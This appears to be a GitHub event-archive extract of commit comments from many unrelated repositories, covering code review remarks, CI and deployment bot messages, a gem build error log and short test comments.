[dev](https://console.stage1.bluemix.net/apps/e0173942-fbb5-42df-a8ff-cca49f037241?env_id=ibm:ys1:us-south \"ibm:ys1:us-south:idsb3t2@us.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-02T05:29:09Z"}
{"id":"7904559759","type":"CommitCommentEvent","actor":{"login":"Seglo28"},"repo":{"name":"Seglo28/pagina-web"},"payload":{"comment":{"id":29561317,"position":4,"line":4,"path":"index.html","commit_id":"8f8f41f36ca3ccc0aa6232cd52f27acc66b8cf5c","created_at":"2018-07-02T05:29:43Z","updated_at":"2018-07-02T05:29:43Z","author_association":"OWNER","body":"Lo raro esq no se ve el cambio al correr el codigo... Bueno, no debo invntar la rueda, pues ya  existe. xD"}},"created_at":"2018-07-02T05:29:43Z"}
{"id":"7904563277","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29561323,"position":29,"line":49,"path":"examples/STM32F405RG/src/main.cpp","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T05:31:11Z","updated_at":"2018-07-02T05:31:11Z","author_association":"OWNER","body":"Если это синглетон, что мешает в другом месте создать еще один экземпляр?"}},"created_at":"2018-07-02T05:31:11Z"}
{"id":"7904563481","type":"CommitCommentEvent","actor":{"login":"githubuserdlp"},"repo":{"name":"githubuserdlp/TEST"},"payload":{"comment":{"id":29561324,"position":null,"line":null,"path":null,"commit_id":"ca9076bc653865997690d0e94ce94f52fff90ba9","created_at":"2018-07-02T05:31:15Z","updated_at":"2018-07-02T05:31:15Z","author_association":"OWNER","body":"[f02072018110101_encrypt.txt](https://github.com/githubuserdlp/TEST/files/2153841/f02072018110101_encrypt.txt)\r\n"}},"created_at":"2018-07-02T05:31:15Z"}
{"id":"7904568393","type":"CommitCommentEvent","actor":{"login":"jinyangxue"},"repo":{"name":"jinyangxue/work"},"payload":{"comment":{"id":29561328,"position":null,"line":null,"path":null,"commit_id":"b9b8385d5a9b4ba5d9bebbdb3dd3dcaa6e16b16e","created_at":"2018-07-02T05:33:09Z","updated_at":"2018-07-02T05:33:09Z","author_association":"OWNER","body":"[work3'.docx](https://github.com/jinyangxue/work/files/2153844/work3.docx)\r\n"}},"created_at":"2018-07-02T05:33:09Z"}
{"id":"7904576723","type":"CommitCommentEvent","actor":{"login":"firelord97"},"repo":{"name":"firelord97/Songle"},"payload":{"comment":{"id":29561339,"position":null,"line":null,"path":null,"commit_id":"29586532646453ba14089e566c6b0f558f15abf6","created_at":"2018-07-02T05:36:25Z","updated_at":"2018-07-02T05:36:25Z","author_association":"OWNER","body":"Design Document addressing design decisions"}},"created_at":"2018-07-02T05:36:25Z"}
{"id":"7904576888","type":"CommitCommentEvent","actor":{"login":"mikehardy"},"repo":{"name":"ACRA/acra"},"payload":{"comment":{"id":29561340,"position":null,"line":null,"path":null,"commit_id":"05e9a5384a981f905913b524f323108838154fe7","created_at":"2018-07-02T05:36:28Z","updated_at":"2018-07-02T05:36:28Z","author_association":"NONE","body":"It was the first pre-requisite, clearly documented, for Java 1.8. I have AnkiDroid up to 5.x now, though if it is worth anything I also qualified 4.11 in testing so this release worked well too"}},"created_at":"2018-07-02T05:36:28Z"}
{"id":"7904585067","type":"CommitCommentEvent","actor":{"login":"odedw"},"repo":{"name":"orbs-network/orbs-spec"},"payload":{"comment":{"id":29561348,"position":null,"line":null,"path":null,"commit_id":"5d16fd55a6285414d3a732881865e692bd7b63b1","created_at":"2018-07-02T05:39:37Z","updated_at":"2018-07-02T05:39:37Z","author_association":"NONE","body":"Probably meant someone else..."}},"created_at":"2018-07-02T05:39:37Z"}
{"id":"7904585919","type":"CommitCommentEvent","actor":{"login":"NiteMoves"},"repo":{"name":"laldon/Ethereal"},"payload":{"comment":{"id":29561350,"position":null,"line":null,"path":null,"commit_id":"5155be0f0aa85a673606523de239a598394b3f8f","created_at":"2018-07-02T05:39:58Z","updated_at":"2018-07-02T05:39:58Z","author_association":"NONE","body":"ThreatRookAttackedByLesser"}},"created_at":"2018-07-02T05:39:58Z"}
{"id":"7904586612","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"jiangxin/git"},"payload":{"comment":{"id":29561352,"position":1339,"line":2096,"path":"po/zh_CN.po","commit_id":"fd8cb379022fc6f5c6d71d12d10c9388b9f5841c","created_at":"2018-07-02T05:40:15Z","updated_at":"2018-07-02T05:40:15Z","author_association":"NONE","body":"什么时候百度百科的信息可以作为参考来源了？\r\n\r\nGoogle 搜索显示「协同软件」结果数为 17,300,000，「协作软件」结果数为 15,300,000。数量上的区别并不显著。而前者大多以「协同办公软件」出现，后者大多以「团队协作软件」出现。从内容上来看，「协同软件」偏向于传统的「办公」「公司管理」的语义，「协作软件」偏向于「互联网」「软件开发」场景。\r\n\r\n因此我依然偏向于译作「协作软件」。"}},"created_at":"2018-07-02T05:40:15Z"}
{"id":"7904590256","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29561354,"position":null,"line":null,"path":null,"commit_id":"0325d0eb8650a29ea27c39ab711fae03414015d4","created_at":"2018-07-02T05:41:47Z","updated_at":"2018-07-02T05:41:47Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#pr-118](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#pr-118).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-118-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-02T05:41:47Z"}
{"id":"7904590673","type":"CommitCommentEvent","actor":{"login":"brantou"},"repo":{"name":"brantou/ob-hy"},"payload":{"comment":{"id":29561356,"position":null,"line":null,"path":null,"commit_id":"a42ecaf440adc03e279afe43ee5ef6093ddd542a","created_at":"2018-07-02T05:41:55Z","updated_at":"2018-07-02T05:41:55Z","author_association":"OWNER","body":"version 1.0.1"}},"created_at":"2018-07-02T05:41:55Z"}
{"id":"7904592868","type":"CommitCommentEvent","actor":{"login":"baquer"},"repo":{"name":"visa/airport-deals"},"payload":{"comment":{"id":29561361,"position":31,"line":31,"path":"AirportMerchantDeals/Network/CardStore.swift","commit_id":"948ea2eba4791535a54c7e37c06b22f54b52a046","created_at":"2018-07-02T05:42:47Z","updated_at":"2018-07-02T05:42:47Z","author_association":"NONE","body":"Its better to perform this function using Alamofire and SwiftyJSon , as it reduces the complexity of the code ."}},"created_at":"2018-07-02T05:42:47Z"}
{"id":"7904592892","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29561362,"position":11,"line":25,"path":"CHANGELOG.zh-CN.md","commit_id":"7123a6da593c0a6fd396abd3ed419de1c53af2e8","created_at":"2018-07-02T05:42:47Z","updated_at":"2018-07-02T05:42:47Z","author_association":"MEMBER","body":"0 前后加空格。"}},"created_at":"2018-07-02T05:42:47Z"}
{"id":"7904593357","type":"CommitCommentEvent","actor":{"login":"madhuri1406"},"repo":{"name":"madhuri1406/hello_world"},"payload":{"comment":{"id":29561366,"position":null,"line":null,"path":null,"commit_id":"45348e5dff1f68f9f17fa90b7e0712eae22a7c29","created_at":"2018-07-02T05:43:00Z","updated_at":"2018-07-02T05:43:00Z","author_association":"OWNER","body":"hi madhuri"}},"created_at":"2018-07-02T05:43:00Z"}
{"id":"7904593853","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29561367,"position":11,"line":25,"path":"CHANGELOG.zh-CN.md","commit_id":"7123a6da593c0a6fd396abd3ed419de1c53af2e8","created_at":"2018-07-02T05:43:12Z","updated_at":"2018-07-02T05:43:12Z","author_association":"MEMBER","body":"这条没修复，删掉。"}},"created_at":"2018-07-02T05:43:12Z"}
{"id":"7904594149","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29561369,"position":8,"line":22,"path":"CHANGELOG.zh-CN.md","commit_id":"7123a6da593c0a6fd396abd3ed419de1c53af2e8","created_at":"2018-07-02T05:43:20Z","updated_at":"2018-07-02T05:43:20Z","author_association":"MEMBER","body":"可以不提。"}},"created_at":"2018-07-02T05:43:20Z"}
{"id":"7904596034","type":"CommitCommentEvent","actor":{"login":"usmanmaqbool636"},"repo":{"name":"usmanmaqbool636/burger-builder1"},"payload":{"comment":{"id":29561375,"position":null,"line":null,"path":null,"commit_id":"565957810a99f4d88f130d1f3bc146077f4ef79a","created_at":"2018-07-02T05:44:08Z","updated_at":"2018-07-02T05:44:08Z","author_association":"OWNER","body":"testing this\r\n"}},"created_at":"2018-07-02T05:44:08Z"}
{"id":"7904598106","type":"CommitCommentEvent","actor":{"login":"153957"},"repo":{"name":"HiSPARC/sapphire"},"payload":{"comment":{"id":29561383,"position":null,"line":null,"path":null,"commit_id":"44b04ab257c1e178fe7f551d7be7cff6e3aeb9e1","created_at":"2018-07-02T05:44:57Z","updated_at":"2018-07-02T05:44:57Z","author_association":"MEMBER","body":"Commit message should have said v1.6.0..."}},"created_at":"2018-07-02T05:44:57Z"}
{"id":"7904609212","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"laldon/Ethereal"},"payload":{"comment":{"id":29561397,"position":null,"line":null,"path":null,"commit_id":"5155be0f0aa85a673606523de239a598394b3f8f","created_at":"2018-07-02T05:49:24Z","updated_at":"2018-07-02T05:49:24Z","author_association":"NONE","body":"ThreatRookAttackedByLaldon"}},"created_at":"2018-07-02T05:49:24Z"}
{"id":"7904617190","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29561408,"position":null,"line":null,"path":null,"commit_id":"a018b25b77be606159c69b87d57c8a82c448b7bd","created_at":"2018-07-02T05:52:34Z","updated_at":"2018-07-02T05:52:34Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#pr-118](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#pr-118).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-118-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-02T05:52:34Z"}
{"id":"7904620043","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29561410,"position":null,"line":null,"path":null,"commit_id":"1c73c817546e014704450dd08ce074852f7a7990","created_at":"2018-07-02T05:53:37Z","updated_at":"2018-07-02T05:53:37Z","author_association":"NONE","body":"### Results for event id: 9b6afe3d-de83-4178-bb94-dc851a91727c\n<details><summary>DockerServerless : Deploy to Lambda (885c94) Execution completed.</summary>\n<p>\n\n**output tail (349 lines total):**\n\n```\n...\nCloudFormation - UPDATE_COMPLETE - AWS::CloudFormation::Stack - sample-artillery-dev\nServerless: Stack update finished...\nService Information\nservice: sample-artillery\nstage: dev\nregion: ap-southeast-2\nstack: sample-artillery-dev\napi keys:\n  None\nendpoints:\n  GET - https://41q462ktgb.execute-api.ap-southeast-2.amazonaws.com/dev/sample-artillery\nfunctions:\n  sample-artillery: sample-artillery-dev-sample-artillery\n\nStack Outputs\nSampleDashartilleryLambdaFunctionQualifiedArn: arn:aws:lambda:ap-southeast-2:347186442473:function:sample-artillery-dev-sample-artillery:2\nServiceEndpoint: https://41q462ktgb.execute-api.ap-southeast-2.amazonaws.com/dev\nServerlessDeploymentBucketName: sample-artillery-dev-serverlessdeploymentbucket-13iyv17iz6ehr\n\nDone in 90.35s.\nApiGateway Endpoints:\n  GET - https://41q462ktgb.execute-api.ap-southeast-2.amazonaws.com/master/sample-artillery\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: 9b6afe3d-de83-4178-bb94-dc851a91727c-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/9b6afe3d-de83-4178-bb94-dc851a91727c-output.tar.gz\n{\n    \"ETag\": \"\\\"027c0468e86f1ee30c55759e92f75b3c\\\"\"\n}\nExecution time was 207 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-02T05:53:37Z"}
{"id":"7904624189","type":"CommitCommentEvent","actor":{"login":"pedroneil"},"repo":{"name":"Waffle/waffle"},"payload":{"comment":{"id":29561417,"position":null,"line":null,"path":null,"commit_id":"ac249a559a07a5ec6937dc95b23eef7be184a57f","created_at":"2018-07-02T05:55:11Z","updated_at":"2018-07-02T05:55:11Z","author_association":"CONTRIBUTOR","body":"nice change to disableSSO. the servlet windows OS check is valid. \r\nin the future if there's a supportedOS other than windows  e.g. Linux using samba libraries then there could be a new init-param. \r\nThank you for removing client OS restrictions,  I have a python Linux client that I'll be trying to get to Negotiate a connection today."}},"created_at":"2018-07-02T05:55:11Z"}
{"id":"7904625144","type":"CommitCommentEvent","actor":{"login":"githubuserdlp"},"repo":{"name":"githubuserdlp/TEST"},"payload":{"comment":{"id":29561418,"position":null,"line":null,"path":null,"commit_id":"ca9076bc653865997690d0e94ce94f52fff90ba9","created_at":"2018-07-02T05:55:32Z","updated_at":"2018-07-02T05:55:32Z","author_association":"OWNER","body":"[f02072018055519_encrypt.txt](https://github.com/githubuserdlp/TEST/files/2153886/f02072018055519_encrypt.txt)\r\n"}},"created_at":"2018-07-02T05:55:32Z"}
{"id":"7904627174","type":"CommitCommentEvent","actor":{"login":"BlowaXD"},"repo":{"name":"BlowaXD/ChickenAPI"},"payload":{"comment":{"id":29561422,"position":11,"line":11,"path":"src/ChickenAPI/Data/TransferObjects/Shop/ShopItemDto.cs","commit_id":"c5c506bceddfcb283e4966a46963c4ca5cecc9a4","created_at":"2018-07-02T05:56:20Z","updated_at":"2018-07-02T05:56:20Z","author_association":"OWNER","body":"long ItemId"}},"created_at":"2018-07-02T05:56:20Z"}
{"id":"7904632911","type":"CommitCommentEvent","actor":{"login":"githubuserdlp"},"repo":{"name":"githubuserdlp/TEST"},"payload":{"comment":{"id":29561436,"position":null,"line":null,"path":null,"commit_id":"ca9076bc653865997690d0e94ce94f52fff90ba9","created_at":"2018-07-02T05:58:28Z","updated_at":"2018-07-02T05:58:28Z","author_association":"OWNER","body":"\r\n{ENTER}\r\n[f02072018055815_download.txt](https://github.com/githubuserdlp/TEST/files/2153892/f02072018055815_download.txt)\r\n"}},"created_at":"2018-07-02T05:58:28Z"}
{"id":"7904636561","type":"CommitCommentEvent","actor":{"login":"carlos-briso"},"repo":{"name":"carlos-briso/prueba"},"payload":{"comment":{"id":29561442,"position":null,"line":null,"path":null,"commit_id":"84a62cd7d6582dca880d0d6dc594a4eef2311ca7","created_at":"2018-07-02T05:59:50Z","updated_at":"2018-07-02T05:59:50Z","author_association":"OWNER","body":"#prueba 4444"}},"created_at":"2018-07-02T05:59:50Z"}
{"id":"7904637022","type":"CommitCommentEvent","actor":{"login":"sakairi-takashi"},"repo":{"name":"sakairi-takashi/sample-cloud-native-toolchain-tutorial-20180702022106424"},"payload":{"comment":{"id":29561445,"position":null,"line":null,"path":null,"commit_id":"c9ab90096017a18139137eec14ed152bcce5db20","created_at":"2018-07-02T06:00:01Z","updated_at":"2018-07-02T06:00:01Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8181c087-ddb8-4d16-ab40-66498955d0ad?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180702022106424\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/1857b5cc-93e2-4070-8238-894efc95e889?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180702022106424\") deployed [sample-cloud-native-toolchain-tutorial-20180702022106424](https://github.com/sakairi-takashi/sample-cloud-native-toolchain-tutorial-20180702022106424/releases/tag/deploy-ibm-yp-us-south-sakairi-jp.ibm.com-test-20180702-060000 \"deploy-ibm-yp-us-south-sakairi-jp.ibm.com-test-20180702-060000\") to [test](https://console.bluemix.net/apps/0a7ab125-4d08-49af-8248-cae128533dcb?env_id=ibm:yp:us-south \"ibm:yp:us-south:sakairi@jp.ibm.com:test\"), including this commit"}},"created_at":"2018-07-02T06:00:01Z"}
{"id":"7904640024","type":"CommitCommentEvent","actor":{"login":"l-s-l"},"repo":{"name":"l-s-l/treegrid-kq"},"payload":{"comment":{"id":29561463,"position":7,"line":82,"path":"src/Table/Table.vue","commit_id":"866fd89f770c91e6fd18535c8ce10fe260128a32","created_at":"2018-07-02T06:00:58Z","updated_at":"2018-07-02T06:00:58Z","author_association":"OWNER","body":"alert(“OK”);"}},"created_at":"2018-07-02T06:00:58Z"}
{"id":"7904643665","type":"CommitCommentEvent","actor":{"login":"Okeyja"},"repo":{"name":"Ehco1996/django-sspanel"},"payload":{"comment":{"id":29561474,"position":null,"line":null,"path":null,"commit_id":"a1febe83617ced2144b777b7a0b2a3ace120962f","created_at":"2018-07-02T06:02:11Z","updated_at":"2018-07-02T06:02:11Z","author_association":"NONE","body":"语文大佬，滑稽.jpg"}},"created_at":"2018-07-02T06:02:11Z"}
{"id":"7904644797","type":"CommitCommentEvent","actor":{"login":"tgxworld"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29561476,"position":null,"line":null,"path":null,"commit_id":"3ddfc123078e1106e6208798f62116a9fcc6799a","created_at":"2018-07-02T06:02:35Z","updated_at":"2018-07-02T06:02:35Z","author_association":"MEMBER","body":"@majakomel :+1: "}},"created_at":"2018-07-02T06:02:35Z"}
{"id":"7904644985","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/onebox"},"payload":{"comment":{"id":29561477,"position":null,"line":null,"path":null,"commit_id":"a581f652d12824e5c3dcc07700d817c8daf0e5d5","created_at":"2018-07-02T06:02:38Z","updated_at":"2018-07-02T06:02:38Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/onebox-preview-for-typeform-steals-focus/90948/6\n"}},"created_at":"2018-07-02T06:02:38Z"}
{"id":"7904648702","type":"CommitCommentEvent","actor":{"login":"sakairi-takashi"},"repo":{"name":"sakairi-takashi/sample-cloud-native-toolchain-tutorial-20180702022106424"},"payload":{"comment":{"id":29561484,"position":null,"line":null,"path":null,"commit_id":"c9ab90096017a18139137eec14ed152bcce5db20","created_at":"2018-07-02T06:03:54Z","updated_at":"2018-07-02T06:03:54Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8181c087-ddb8-4d16-ab40-66498955d0ad?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180702022106424\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/1857b5cc-93e2-4070-8238-894efc95e889?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180702022106424\") deployed [sample-cloud-native-toolchain-tutorial-20180702022106424](https://github.com/sakairi-takashi/sample-cloud-native-toolchain-tutorial-20180702022106424/releases/tag/deploy-ibm-yp-us-south-sakairi-jp.ibm.com-prod-20180702-060353 \"deploy-ibm-yp-us-south-sakairi-jp.ibm.com-prod-20180702-060353\") to [prod](https://console.bluemix.net/apps/f29fea8d-4109-4320-b50b-8d940d5a34ab?env_id=ibm:yp:us-south \"ibm:yp:us-south:sakairi@jp.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-02T06:03:54Z"}
{"id":"7904657012","type":"CommitCommentEvent","actor":{"login":"deindedawodu"},"repo":{"name":"deindedawodu/yarn-flex"},"payload":{"comment":{"id":29561499,"position":null,"line":null,"path":null,"commit_id":"9f2d38fec25403feb24dea7f5ce38d449f1a4f4c","created_at":"2018-07-02T06:06:59Z","updated_at":"2018-07-02T06:06:59Z","author_association":"OWNER","body":"so I did"}},"created_at":"2018-07-02T06:06:59Z"}
{"id":"7904658754","type":"CommitCommentEvent","actor":{"login":"pankaj94"},"repo":{"name":"pankaj94/vishalsecuritysystems"},"payload":{"comment":{"id":29561501,"position":null,"line":null,"path":null,"commit_id":"e97c5c5fa7027538b0475fe32d2f1a6770ddefa3","created_at":"2018-07-02T06:07:35Z","updated_at":"2018-07-02T06:07:35Z","author_association":"OWNER","body":"Delete"}},"created_at":"2018-07-02T06:07:35Z"}
{"id":"7904663868","type":"CommitCommentEvent","actor":{"login":"not-an-anagram-lover"},"repo":{"name":"not-an-anagram-lover/python-ML-1"},"payload":{"comment":{"id":29561506,"position":3,"line":2,"path":"README.md","commit_id":"5a78fa22220969fc239de9120d8d1d3505da5e19","created_at":"2018-07-02T06:09:26Z","updated_at":"2018-07-02T06:09:26Z","author_association":"OWNER","body":"Introductory steps towards Machine Learning\r\n\r\nThis contains notes of Andrew Ng coursera Mahcine Learning course as 1.0.\r\nImplementation of of 7 algorithms of Machine Learning, some of which may have issues with data visualization.\r\nAnd lastly a small menu driven project.\r\n\r\n\r\n(sources:-\r\nhttp://www.holehouse.org/mlclass/\r\nhttp://www.opengardensblog.futuretext.com/wp-content/uploads/2014/03/OctaveTutorialAndrewNg.pdf \r\n)\r\n"}},"created_at":"2018-07-02T06:09:26Z"}
{"id":"7904663956","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29561507,"position":null,"line":null,"path":null,"commit_id":"bc98df8a4527bcce4ef88494de1b71c448b033bd","created_at":"2018-07-02T06:09:28Z","updated_at":"2018-07-02T06:09:28Z","author_association":"COLLABORATOR","body":"Puzzle `279-4664e37c` discovered in   [`test/commands/test_alias.rb`](  https://github.com/zold-io/zold/blob/master/test/commands/test_alias.rb)   and submitted as #322. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-02T06:09:28Z"}
{"id":"7904664172","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29561508,"position":null,"line":null,"path":null,"commit_id":"bc98df8a4527bcce4ef88494de1b71c448b033bd","created_at":"2018-07-02T06:09:32Z","updated_at":"2018-07-02T06:09:32Z","author_association":"COLLABORATOR","body":"Puzzle `279-d44ca5ec` discovered in   [`lib/zold/commands/alias.rb`](  https://github.com/zold-io/zold/blob/master/lib/zold/commands/alias.rb)   and submitted as #323. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-02T06:09:32Z"}
{"id":"7904668332","type":"CommitCommentEvent","actor":{"login":"kavya1990"},"repo":{"name":"muvatech/Shopping-Cart-Using-Django-2.0-and-Python-3.6"},"payload":{"comment":{"id":29561513,"position":null,"line":null,"path":null,"commit_id":"c280b66df336285531d23f2eb4b0d0a881bed442","created_at":"2018-07-02T06:10:58Z","updated_at":"2018-07-02T06:10:58Z","author_association":"NONE","body":"Hi henry,\r\nThank you so much for your reply...let me explain my issue clearly,,,ya ur correct, we cannot add 0 product i will agree with this, actually my question is \"suppose in the quantity 10 products are there , in that i will add 1 product to the cart,after purchasing that product quantity should reduce to 9 rt,,,,in the product details.that one is not happening please help me with this."}},"created_at":"2018-07-02T06:10:58Z"}
{"id":"7904668528","type":"CommitCommentEvent","actor":{"login":"hxqqqqqq"},"repo":{"name":"TheMagician1/redmine_backlogs"},"payload":{"comment":{"id":29561514,"position":null,"line":null,"path":null,"commit_id":"75b8c77a95e671e0efbb6deb89fc500167057652","created_at":"2018-07-02T06:11:02Z","updated_at":"2018-07-02T06:11:02Z","author_association":"NONE","body":"Installing nokogiri 1.8.2 with native extensions\r\nUsing rack-test 0.6.3\r\nUsing mime-types 3.1\r\nUsing addressable 2.5.2\r\nUsing sprockets 3.7.1\r\nGem::Ext::BuildError: ERROR: Failed to build gem native extension.\r\n\r\n    current directory: /apps/redmine/ruby/lib/ruby/gems/2.3.0/gems/eventmachine-1.2.7/ext\r\n/apps/redmine/ruby/bin/ruby -r ./siteconf20180702-16732-13emnf4.rb extconf.rb\r\n*** extconf.rb failed ***\r\nCould not create Makefile due to some reason, probably lack of necessary\r\nlibraries and/or headers.  Check the mkmf.log file for more details.  You may\r\nneed configuration options.\r\n\r\nProvided configuration options:\r\n\t--with-opt-dir\r\n\t--without-opt-dir\r\n\t--with-opt-include\r\n\t--without-opt-include=${opt-dir}/include\r\n\t--with-opt-lib\r\n\t--without-opt-lib=${opt-dir}/lib\r\n\t--with-make-prog\r\n\t--without-make-prog\r\n\t--srcdir=.\r\n\t--curdir\r\n\t--ruby=/apps/redmine/ruby/bin/$(RUBY_BASE_NAME)\r\n\t--with-ssl-dir\r\n\t--without-ssl-dir\r\n\t--with-ssl-include\r\n\t--without-ssl-include=${ssl-dir}/include\r\n\t--with-ssl-lib\r\n\t--without-ssl-lib=${ssl-dir}/lib\r\n\t--with-openssl-config\r\n\t--without-openssl-config\r\n\t--with-pkg-config\r\n\t--without-pkg-config\r\n/apps/redmine/ruby/lib/ruby/2.3.0/mkmf.rb:456:in `try_do': The compiler failed to generate an executable file.\r\n(RuntimeError)\r\nYou have to install development tools first.\r\n\tfrom /apps/redmine/ruby/lib/ruby/2.3.0/mkmf.rb:541:in `try_link0'\r\n\tfrom /apps/redmine/ruby/lib/ruby/2.3.0/mkmf.rb:556:in `try_link'\r\n\tfrom /apps/redmine/ruby/lib/ruby/2.3.0/mkmf.rb:657:in `try_ldflags'\r\n\tfrom /apps/redmine/ruby/lib/ruby/2.3.0/mkmf.rb:1813:in `pkg_config'\r\n\tfrom extconf.rb:65:in `pkg_config_wrapper'\r\n\tfrom extconf.rb:92:in `<main>'\r\n\r\nTo see why this extension failed to compile, please check the mkmf.log which can be found here:\r\n\r\n  /apps/redmine/ruby/lib/ruby/gems/2.3.0/extensions/x86_64-linux/2.3.0-static/eventmachine-1.2.7/mkmf.log\r\n\r\nextconf failed, exit code 1\r\n\r\nGem files will remain installed in /apps/redmine/ruby/lib/ruby/gems/2.3.0/gems/eventmachine-1.2.7 for inspection.\r\nResults logged to\r\n/apps/redmine/ruby/lib/ruby/gems/2.3.0/extensions/x86_64-linux/2.3.0-static/eventmachine-1.2.7/gem_make.out\r\n\r\nAn error occurred while installing eventmachine (1.2.7), and Bundler cannot continue.\r\nMake sure that `gem install eventmachine -v '1.2.7'` succeeds before bundling.\r\nbash-4.1# gem install eventmachine -v '1.2.7'\r\nBuilding native extensions.  This could take a while...\r\nERROR:  Error installing eventmachine:\r\n\tERROR: Failed to build gem native extension.\r\n\r\n    current directory: /apps/redmine/ruby/lib/ruby/gems/2.3.0/gems/eventmachine-1.2.7/ext\r\n/apps/redmine/ruby/bin/ruby -r ./siteconf20180702-17154-ik48o.rb extconf.rb\r\n*** extconf.rb failed ***\r\nCould not create Makefile due to some reason, probably lack of necessary\r\nlibraries and/or headers.  Check the mkmf.log file for more details.  You may\r\nneed configuration options.\r\n\r\nProvided configuration options:\r\n\t--with-opt-dir\r\n\t--without-opt-dir\r\n\t--with-opt-include\r\n\t--without-opt-include=${opt-dir}/include\r\n\t--with-opt-lib\r\n\t--without-opt-lib=${opt-dir}/lib\r\n\t--with-make-prog\r\n\t--without-make-prog\r\n\t--srcdir=.\r\n\t--curdir\r\n\t--ruby=/apps/redmine/ruby/bin/$(RUBY_BASE_NAME)\r\n\t--with-ssl-dir\r\n\t--without-ssl-dir\r\n\t--with-ssl-include\r\n\t--without-ssl-include=${ssl-dir}/include\r\n\t--with-ssl-lib\r\n\t--without-ssl-lib=${ssl-dir}/lib\r\n\t--with-openssl-config\r\n\t--without-openssl-config\r\n\t--with-pkg-config\r\n\t--without-pkg-config\r\n/apps/redmine/ruby/lib/ruby/2.3.0/mkmf.rb:456:in `try_do': The compiler failed to generate an executable file. (RuntimeError)\r\nYou have to install development tools first.\r\n\tfrom /apps/redmine/ruby/lib/ruby/2.3.0/mkmf.rb:541:in `try_link0'\r\n\tfrom /apps/redmine/ruby/lib/ruby/2.3.0/mkmf.rb:556:in `try_link'\r\n\tfrom /apps/redmine/ruby/lib/ruby/2.3.0/mkmf.rb:657:in `try_ldflags'\r\n\tfrom /apps/redmine/ruby/lib/ruby/2.3.0/mkmf.rb:1813:in `pkg_config'\r\n\tfrom extconf.rb:65:in `pkg_config_wrapper'\r\n\tfrom extconf.rb:92:in `<main>'\r\n\r\nTo see why this extension failed to compile, please check the mkmf.log which can be found here:\r\n\r\n  /apps/redmine/ruby/lib/ruby/gems/2.3.0/extensions/x86_64-linux/2.3.0-static/eventmachine-1.2.7/mkmf.log\r\n\r\nextconf failed, exit code 1\r\n\r\nGem files will remain installed in /apps/redmine/ruby/lib/ruby/gems/2.3.0/gems/eventmachine-1.2.7 for inspection.\r\nResults logged to /apps/redmine/ruby/lib/ruby/gems/2.3.0/extensions/x86_64-linux/2.3.0-static/eventmachine-1.2.7/gem_make.out\r\n"}},"created_at":"2018-07-02T06:11:02Z"}
{"id":"7904670110","type":"CommitCommentEvent","actor":{"login":"sunjingsong"},"repo":{"name":"sunjingsong/sunjingsong"},"payload":{"comment":{"id":29561518,"position":null,"line":null,"path":null,"commit_id":"6bd3fa18a9c0dd22bdfc0e9a3e89a4c36e2d5f62","created_at":"2018-07-02T06:11:35Z","updated_at":"2018-07-02T06:11:35Z","author_association":"OWNER","body":"This is my first web."}},"created_at":"2018-07-02T06:11:35Z"}
